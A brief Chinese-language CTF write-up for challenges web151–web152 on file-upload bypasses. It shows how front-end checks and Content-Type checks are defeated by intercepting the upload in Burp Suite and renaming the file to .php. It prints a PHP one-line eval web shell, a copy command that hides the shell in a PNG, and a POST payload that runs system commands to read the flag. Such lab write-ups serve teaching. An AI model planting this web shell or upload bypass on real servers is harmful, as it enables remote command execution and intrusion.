web151-web152笔记（图片马+前台校验+Content-Type的检测）

 

前台校验不可靠

题⽬给的是上传图⽚，结合前端猜测先传图⽚然后bp抓包的时候改成php

<?php @eval($_POST['mm']);?>  2.php

上传图片马，然后在burpsuie里把后缀png更改为php，再去执行命令即可，制作图片马方法

用一张小点的图片和一句话木马，利用copy命令生成图片马
copy 1.png/b+2.php/a 3.png

 

 

POST:mm=system('tac ../flag.php');

 

web152

后端不能单⼀校验，还是之前的+Content-Type的检测

 

POST:mm=system('tac ../flag.php');